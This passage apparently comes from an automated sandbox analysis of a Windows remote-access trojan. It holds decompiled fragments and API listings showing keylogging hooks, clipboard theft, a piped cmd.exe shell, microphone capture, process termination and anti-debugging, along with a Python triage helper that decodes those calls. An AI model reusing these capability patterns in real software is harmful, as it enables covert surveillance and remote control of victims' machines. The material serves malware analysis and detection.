                                        • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                        • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                        • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                        • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%
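The stubs above resolve GetLastInputInfo, GetCursorInfo and GetConsoleWindow through LoadLibraryA/GetModuleHandleA + GetProcAddress rather than the import table, E00401181 queues 32-byte WAVEHDR structures for waveIn, E004052D5 installs hook type 0xd, and the registry helper that follows opens keys with access mask 0x20019. Those constants are easy to misread in a long listing. The Python below is an added example, not part of this report or of the sample: it parses "APIs" lines in the format the report uses, pairs each loader call with the GetProcAddress that follows it, and decodes the hook id, HKEY root and access mask into their Windows SDK names. The input is copied from the listings on this page, except for the SetWindowsHookExA line, which is constructed from the decompiled call `SetWindowsHookExA(0xd, E004052BA, 0, 0)` because the report's API list for that function is empty; the capability wording in PROBES and in the notes is this example's own.

```python
"""Triage helper for the "APIs" listings in this report (added example, not sandbox output).

Lines look like:
  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
  • GetProcAddress.KERNEL32(00000000), ref: 0041202F
The listing prints stack slots beyond an API's real parameters, which is why the
loader call already shows the name the following GetProcAddress receives.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<sym>.+?)\.(?P<module>[A-Za-z0-9_]+)"          # symbol may contain ?$@ (C++ mangling)
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}
HOOK_IDS = {2: "WH_KEYBOARD", 7: "WH_MOUSE", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = {0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
              0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
              0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY", 0x20000: "READ_CONTROL"}
KEY_COMPOSITE = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
# Labels for the run-time-resolved exports seen in this report (this example's own wording).
PROBES = {"GetLastInputInfo": "time since last user input", "GetCursorInfo": "cursor state",
          "GetConsoleWindow": "console window handle"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall: bool


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["sym"], m["module"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls


def _hex(arg: str) -> Optional[int]:
    """Stack values are printed as bare hex; '?' and string literals decode to None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_access_mask(mask: int) -> str:
    """Name a registry access mask, e.g. 0x20019 -> KEY_READ."""
    if mask in KEY_COMPOSITE:
        return KEY_COMPOSITE[mask]
    names = [n for bit, n in KEY_RIGHTS.items() if mask & bit]
    rest = mask & ~sum(KEY_RIGHTS)          # bits this table does not know
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def resolve_imports(calls: List[ApiCall]) -> List[Tuple[str, str, int]]:
    """Pair each LoadLibrary*/GetModuleHandle* with the GetProcAddress that follows it."""
    pairs = []
    for prev, cur in zip(calls, calls[1:]):
        if cur.name == "GetProcAddress" and prev.name in LOADERS and len(prev.args) >= 2:
            pairs.append((prev.args[0], prev.args[1], cur.ref))   # (dll, export, ref of GetProcAddress)
    return pairs


def summarize(calls: List[ApiCall]) -> List[Tuple[int, str, str]]:
    """Return (ref, api, note) triples for calls whose constants identify a capability."""
    out = []
    for dll, proc, ref in resolve_imports(calls):
        if proc in PROBES:
            out.append((ref, "GetProcAddress", f"resolves {dll}!{proc} at run time ({PROBES[proc]})"))
    for c in calls:
        hx = [_hex(a) for a in c.args]
        if c.name.startswith("SetWindowsHookEx") and hx and hx[0] is not None:
            out.append((c.ref, c.name, f"installs {HOOK_IDS.get(hx[0], hex(hx[0]))} hook"))
        elif c.name.startswith("RegOpenKeyEx") and len(hx) >= 4 and hx[3] is not None:
            root = HKEYS.get(hx[0], "hKey")
            out.append((c.ref, c.name, f"opens {root} subkey with {decode_access_mask(hx[3])}"))
        elif c.name.startswith("waveIn") and 0x20 in hx:
            out.append((c.ref, c.name, "queues a WAVEHDR (cbwh=0x20) for microphone capture"))
    return out


# Constructed input: copied from the listings on this page, except the SetWindowsHookExA line,
# which is written from the decompiled call at 0x004052FA because that function's API list is empty.
SAMPLE = """\
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
• GetProcAddress.KERNEL32(00000000), ref: 0041202F
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
• GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
• LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
• GetProcAddress.KERNEL32(00000000), ref: 00413B03
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
• RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
• RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
• waveInPrepareHeader.WINMM(02EA2948,00000020,?,?,0040116A,00000000), ref: 0040120D
• waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
• malloc.MSVCRT ref: 0040B64B
• SetWindowsHookExA.USER32(0000000D,004052BA,00000000,00000000), ref: 004052FA
"""

if __name__ == "__main__":
    for ref, api, note in summarize(parse_api_lines(SAMPLE)):
        print(f"{ref:08X} {api}: {note}")
```

Running the module prints one line per finding; the functions return plain tuples so the output can be fed to a notebook or a rule generator. The parser skips lines it does not recognise rather than failing, which is the right default for extraction noise in a report of this size, and `_hex` treats anything that is not bare hex (the `?` placeholders, string literals such as `User32.dll`) as unknown instead of guessing.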

                                        C-Code - Quality: 18%
                                        			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
                                        				int _v8;
                                        				char _v2056;
                                        
                                        				_v8 = 0x400;
                                        				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
                                        					_push( &_a15);
                                        					_push(0x415800);
                                        				} else {
                                        					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
                                        					RegCloseKey(_a8);
                                        					_push( &_a15);
                                        					_push( &_v2056);
                                        				}
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
                                        				return _a4;
                                        			}

                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                        • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                        • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                        • String ID:
                                        • API String ID: 4081865614-0
                                        • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                        • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                        • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                        • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0040D87E() {
                                        				char _t9;
                                        				void* _t22;
                                        				void* _t28;
                                        				intOrPtr _t29;
                                        
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
                                        				_t29 =  *0x41b889; // 0x0
                                        				if(_t29 == 0) {
                                        					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        					E00402B8A(_t9);
                                        				}
                                        				E004017DD(_t22 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                          • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                          • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                          • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                          • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                          • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                          • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                          • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                          • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                          • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                          • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                        • String ID:
                                        • API String ID: 187635395-0
                                        • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                        • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                        • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                        • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 384503197-0
                                        • Opcode ID: 2dfa9e07ec5e251ddcfc6defdda0276f547ce66a674e16cb6872e78d440df24c
                                        • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                        • Opcode Fuzzy Hash: 2dfa9e07ec5e251ddcfc6defdda0276f547ce66a674e16cb6872e78d440df24c
                                        • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 27%
                                        			E00406BEF(void* __ecx, intOrPtr _a4) {
                                        				char _v5;
                                        				void* _t15;
                                        
                                        				if(OpenClipboard(0) == 0) {
                                        					L3:
                                        					_push( &_v5);
                                        					_push(0x415664);
                                        				} else {
                                        					_t15 = GetClipboardData(1);
                                        					CloseClipboard();
                                        					if(_t15 == 0) {
                                        						goto L3;
                                        					} else {
                                        						_push( &_v5);
                                        						_push(_t15);
                                        					}
                                        				}
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				return _a4;
                                        			}

                                        APIs
                                        • OpenClipboard.USER32(00000000), ref: 00406BF6
                                        • GetClipboardData.USER32 ref: 00406C02
                                        • CloseClipboard.USER32(?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C0A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C27
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                        • String ID:
                                        • API String ID: 1727351239-0
                                        • Opcode ID: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                        • Instruction ID: d068d5d9f876e73b388ef04ee2f39e673df6a44b067aa838ba22f5a803aba3f5
                                        • Opcode Fuzzy Hash: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                        • Instruction Fuzzy Hash: 05E03075504615EFE7409B50DC49FDA7BACDB85B52F408035B90ADA280D7749980CAA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                        • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                        • String ID:
                                        • API String ID: 3911305588-0
                                        • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                        • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                        • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                        • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E0040D7C0(void* __eflags) {
                                        				char* _t5;
                                        				void* _t20;
                                        
                                        				_t5 = E0040180C(_t20 - 0x10, __eflags, 0);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				E004126BC(atoi(_t5));
                                        				E004017DD(_t20 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7CC
                                        • atoi.MSVCRT ref: 0040D7D3
                                          • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                          • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                          • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                        • String ID:
                                        • API String ID: 1377568529-0
                                        • Opcode ID: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                        • Instruction ID: 2746f951d2caaa68166efb6d96d37f5946b4e222a380c15f16ac4a6add4f85c7
                                        • Opcode Fuzzy Hash: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                        • Instruction Fuzzy Hash: 54E0ED72914519CBCB04ABE1EC599ED7324EB90316F50483FE112E60E1EE785555CB1C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E0040DCD4() {
                                        				void* _t15;
                                        				intOrPtr _t19;
                                        
                                        				E0040AC8C();
                                        				exit(0);
                                        				while(1) {
                                        					_t19 =  *0x41beb8; // 0x0
                                        					if(_t19 == 0) {
                                        						break;
                                        					}
                                        					Sleep(0x64);
                                        				}
                                        				E00408245();
                                        				E004017DD(_t15 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • exit.MSVCRT ref: 0040DCDB
                                        • Sleep.KERNEL32(00000064), ref: 0040DCED
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                        • String ID:
                                        • API String ID: 772260455-0
                                        • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                        • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                        • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                        • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                        • String ID: [LCtrl] $ [RCtrl]
                                        • API String ID: 4257247948-618823999
                                        • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                        • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                        • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                        • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                        • String ID: open
                                        • API String ID: 317973523-2758837156
                                        • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                        • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                        • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                        • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        APIs
                                        • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,014ECDB7,00000000,00000000), ref: 014ECF08
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.766320408.00000000014E0000.00000040.00000001.sdmp, Offset: 014E0000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID:
                                        • API String ID: 4046476035-0
                                        • Opcode ID: 8f5c36db4958cc86623c3baa34e84cc6b22ab0534ce8b6ed62031c37851ae750
                                        • Instruction ID: 05d4bb22bb185b949e6d98d46976e9b5e38e7efe52d3357a2656bf0cda32a599
                                        • Opcode Fuzzy Hash: 8f5c36db4958cc86623c3baa34e84cc6b22ab0534ce8b6ed62031c37851ae750
                                        • Instruction Fuzzy Hash: 121104B19042089FCB10DF9AC488BDFBBF5FB48324F14842AE559A7350C375A955CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 014EFE36
